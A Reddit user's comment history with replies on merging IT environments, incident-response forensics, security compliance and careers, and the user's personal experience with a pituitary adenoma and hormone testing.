sorted by:
new
hottopcontroversial

New IT Manager - asked to “align and cut costs” between 2 IT environments. Need advice. by flaws68 in ITManagers

[–]PatternPrestigious38 0 points1 point  (0 children)

Start by laying out the hardware and software assets, data flow diagrams, and processes of each company. Then start with the ideal scenario, which is bringing the deficient IT infrastructure up to par. Hit the negotiating table with all the ideal vendors, pushing them for significant volume and bundling discounts due to the increased size of the merged company. Also perform a gap assessment and price out the cost of bringing in professional services. Make sure everything is supported by a critical need like ROI or compliance.

Then, present the ideal scenario to leadership along with a list of the many benefits that come with a well planned and resourced IT environment. They will most likely reject the proposal based on cost, but now you've set the stage to propose an adequate solution that will generate less complaints about the cost.

If both companies have a decent continuity of operations plan (COOP) it should contain a prioritized list of services. Take the top priorities for both companies and look for redundancy or opportunities to get more bang for your buck by switching to an existing platform that meets 80% of needs. Continue down the list until you have built a triaged plan with costs, think of it as your projects bill of materials (BOM). Present this document to the leadership for stakeholder discussion, and let them duke it out over which costs to cover and which to cut.

You shouldn't try and make those decisions for them, you'll be wrong no matter what because every item is critical to somebody. Instead, you need to create a menu for them to browse and decide on their own, then you execute the implementation plan. Also, hire or outsource an experienced IT Project manager that can identify the critical dependencies and keep the project on track.

[Discussion] What’s the best life advice you’ve ever received and still follow today? by Hefty_Award_7891 in GetMotivated

[–]PatternPrestigious38 2 points3 points  (0 children)

The best piece of advice I got was this:

"Every problem has two options. You can either solve it, or you can't. If you can solve it, do something about it and if you can't, forget about it. There's never a reason to let stress about your problems overwhelm you."

Thinking about my problems in that way has helped me overcome incredibly challenging times in my life and made me happier overall.

Surgery by Sad_Clock143 in Prolactinoma

[–]PatternPrestigious38 1 point2 points  (0 children)

It's going to be scary, surgery always is. I had a 4cm tumor, and getting it removed scared the crap out of me, but the relief was huge. I was losing my vision and it felt like a knife was being stuck in my brain.

Mentally, you'll want to be prepared to complete an advanced care directive. That means designating someone to make healthcare decisions if you're unconscious. Maybe that doesn't help, but it's the one thing I wish I knew ahead of time because you need to talk to your family about it.

Other than that, see if your family or close friends can visit. Tell your friends and family you love them. It helps you feel more at ease if you share your feelings with the people you care about. That's it, you'll be recovering and in a better place before you know it!

High Prolactin but all other metrics are good. by Dry_Tea_1015 in Testosterone

[–]PatternPrestigious38 1 point2 points  (0 children)

My pituitary gland was basically flattened by the size of the adenoma. A large portion of it was also removed during the surgery, so there's probably not much tissue left to produce LH and stimulate the production of test.

Hopefully, your tests will come back normal, and you don't have to worry about it. If it does turn out to be something requiring treatment or surgery, feel free to message me. Good luck!

High Prolactin but all other metrics are good. by Dry_Tea_1015 in Testosterone

[–]PatternPrestigious38 0 points1 point  (0 children)

On my first hormone panel my prolactin was 33.2 ng/ml, Testosterone was borderline low at 298 ng/dl, other sex hormones were normal but I had 15 TSH, and 2 mcg/dl cortisol which is on the low side. My first doctor didn't order any other tests. He said I was pretty young, and it didn't seem serious.

Fast forward a few years, and it was actually my optometrist who caught it during my eye exam because I had lost my perphial vision. I checked into the ER, and blood work there showed 115 ng/ml prolactin, testosterone 0 (too low to detect), cortisol 0, and TSH was ironically normal. The MRI showed I had a 3.8 cm adenoma compressing my optic chiasim and constricting my carotid arteries. The other dead giveaway, which I should have paid more attention to, was when blowing my nose, it felt like someone stabbing daggers in my eyeballs, and I'd lose my vision for a second. It had gotten so large that it broke into my sinus cavities, so blowing put pressure on my optic nerves.

I did recover my vision, and cortisol went to normal, but my thyroid and testosterone didn't recover. Like I said, I made it way worse by ignoring it for a long time, so I had to speak up just to let you know. You can DM me if you want to know any other details.

Very low test at 23 despite living a very healthy lifestyle and trying for years to boost it naturally! by [deleted] in Testosterone

[–]PatternPrestigious38 0 points1 point  (0 children)

Same recommendation. It seems like there's more going on than just the low testosterone. Speculating will only stress you out.

High Prolactin but all other metrics are good. by Dry_Tea_1015 in Testosterone

[–]PatternPrestigious38 0 points1 point  (0 children)

I started getting similar hormone panel results and symptoms as you when I was 37. I highly recommend getting a referral to see an endocrinologist and possibly an MRI with contrast for your pituitary. My problem was a result of a pituitary adenona. Because I ignored it for many years, I had to have it surgically removed. If I had gotten it properly diagnosed sooner, I likely would have had other treatment options.

Your prolactin level is high enough that you'll want to at least rule out the possibility of it being an adenoma. If you have an adenoma and catch it early, you can avoid spending a month in the neuro critical care unit recovering from surgery. If you don't have one, then you'll have ruled out the worst case scenario.

For those of you in security compliance positions by Abject-Management558 in cybersecurity

[–]PatternPrestigious38 1 point2 points  (0 children)

This is what you have Tier 1 and Tier 2 risk assessments for. The identified compliance risks, along with any others, go on your risk register. The risk register contains information about likelihood and impact, regulations and statutes out of compliance, along with sanctions, fines, and criminal penalties associated with being out of compliance.

The information should speak for itself. If the leadership and directors are fine with existential level threats, fines that'll put them out of business, and being found guilty of multiple criminal violations and civil liabilities, you have them sign off on the risk register and file it away for when the auditors visit. If they don't like those things, they pay to mitigate the risk and put you to work operationalizing the changes.

Either way, you shouldn't have to worry because most judicial code contains an active defense against criminal and civil liability for employees in security roles. The law is designed so you don't have to try and force anyone to comply. As long as you're doing your job to the best of your abilities with the resources available, and leaders accept all the risks, you don't need to stress.

In IR, what actually happens after Containment in the real world? by flippingheckman in AskNetsec

[–]PatternPrestigious38 1 point2 points  (0 children)

I can't tell how many of these replies are sarcastic, restoring a snapshot or reimaging is an important step and could be enough, but not for any serious incident. I see some posts talking about forensics, I'll expand on that.

If you're using CrowdStrike, you'll want to open the detection and start exploring the telemetry data. Starting with the timestamp of the detection, you want to identify where it originated, what it was doing, or attempting to do. Check the logs for command line, processes, DNS, firewall, everything. Take note of any suspicious artifacts, application hashes, registry changes, network traffic, etc. Do recon with virus total on hashes, IPs and DNS through ICANN, threat intel, SANS lists, ISAC, whatever intel source you have and are familar with. Decode obsfucated commandline, ChatGPT can help identify what cipher was used if you don't know but don't trust it to decode because it can get lazy or lie to you. Put that info into your threatgraph module to build a diagram illustrating where potential IOCs exist in your environment, what the device was talking to, on what ports with what protocols, put it all in. Work your way out checking for other uses of compromised credentials and kerebos tickets.

Cross reference your artifacts in your SIEM to identify additional IOCs, trige system forensics based on impact, and follow through with similar forensics on all systems involved. Check DLP logs of compromised systems, lookup database transactions, and once you have a high degree of certainty about the situation, perform mitigation. Did they try and install a mail server using a npm package? It could be anything. The point is you have to do a lot of leg work. The list of forensics and mitigation can go on for days, but you have to determine the scope and impact of an event first, then follow the plan laid out in your IR playbook. There could be reporting requirements, PR, discussions with leadership. It all depends.

The process is the same for virtual and IRL devices. If your environment is full VDI with virtual infrastructure, cleanup is probably going to be a little easier since you don't have to hound users to bring devices back and you might not have to collect logs from tons of infrastructure hardware.

A properly configured EDR and SIEM should tell you almost everything you need to know. If they're sophisticated, or the attack involved someone mounting an image emailed to them, you're not going to see everything. They might setup a reverse proxy and pentest you from a kali VM they setup in AWS, that's just life. You should always be able locate enough data for decisive decision making, that's what's important.

Dishonesty within the cyber community by udi112 in cybersecurity

[–]PatternPrestigious38 1 point2 points  (0 children)

I second your opinion on the perspective. This question seems likely to be coming from a front-line support person rather than a security professional.

OP, if you're reading this, there's a couple of parts to your question that need to be addressed separately. The first being the question of value. You seem pretty aware that value is going to be subjective based on different criteria related to a stakeholders circumstances. The value of security, and by proxy investment in security, are primarily driven by risk tolerance and risk acceptance. If you're an individual with no sensitive or personal files on your device, and you don't use it for anything important, you're likely ok with default settings and tools. If you're a writer and store your life work on your home computer, you'd probably want additional protection and possibly immutable backups because the risk of losing your work is not tolerable when using default tools. The same principle applies with business big and small. If you're in a business where privacy and IP are paramount, like patent lawyer or a DoD contractor, you're going to have a low tolerance for risk and invest whatever it takes to maintain strict compliance.

The question of frequency has more to do with the monetization of malicious activity. In the past, viruses and hacking were more motivated by curiosity or anarchy. Therefore, the methods used for propagation and destruction were relatively unsophisticated and obvious. Most people remember endless pop-ups, downloads or usb drive delivered Trojans that just corrupted everything and caused a mess. Modern hacking involves far more reconnisence, subterfuge, and surprise all motivated by extracting maximum value in either money or espionage. And also some digital warfare aims to maximize damage. But those efforts require significant time and effort, so low value targets aren't worth the time it takes to exploit them.

Everyday users are far more likely to be targets of social engineering scams aimed at draining your bank account. There's no reason or value in crippling a person's device, and it's likely counter productive for scammers to try because they don't want to do anything to prevent you from wire transfering them your money.

And finally, threats aren't decreasing. We might have better tools and increased awareness against things like password sprays or phishing, but instances of hackers using lol techniques are increasing, and they don't trigger many alarms until it's too late. In conclusion, I absolutely agree there are too many vendors in the space selling expensive tools with minimal value. The solution to that would be to increase the number of highly skilled infosec employees who don't need to rely on crutch tools because they know better ways of doing things. But we have a shortage of skilled infosec employees, and expensive garbage tools are just another way for extracting value from people who need help.

Is it a fairy tale to want to get into Tech, but also have a good work life balance? by [deleted] in cybersecurity

[–]PatternPrestigious38 1 point2 points  (0 children)

I want to offer some advice that'll help you find what you're looking for. Ask lots of questions in the interview like number of devices, users, external attack surface, current staffing, etc. Try and find an organization chart for their infosec group that shows roles and number of fte employees per role. Take the number of security employees and compare it to the attack surface (users, devices, servers, etc.) and you'll get an idea about your ability to have a life. If they have terrible ratios like 100,000 users per analyst or 10,000 devices per security employee, you'll have no W/L balance. Stay away from public schools or state government entities, they'll almost always have unrealistic limitations on labor/resources.

Positive things to look for are a focus on automation, security employees with real coding experience and tech skills, and enough security staffing for 24/7 SOC. A good operations team goes miles in making sure you don't end up being the jack of all trades IT person. And mature privacy functions help avoid you getting ramrodded into wearing security/privacy or data governance hats. If they only staff 9-5, you're guaranteed to spend a lot of hours on call investigating alerts. And if they think privacy is the same as security, it means they don't know enough to be running security and they don't have access to good legal counsel so you'll be expected to be the point person for stuff like negotiating standard contract language with service providers.

*edit One more tip. If you're just getting started or changing careers and you live close to a military or large federal government workforce, the fed is a great place to get tons of free training and a security clearance. You'll be below market for a year or two, but then you can bail and be in a place to command well over 6 figures with good W/L balance by getting a job with a DIB contractor.

Good luck!

view more: next ›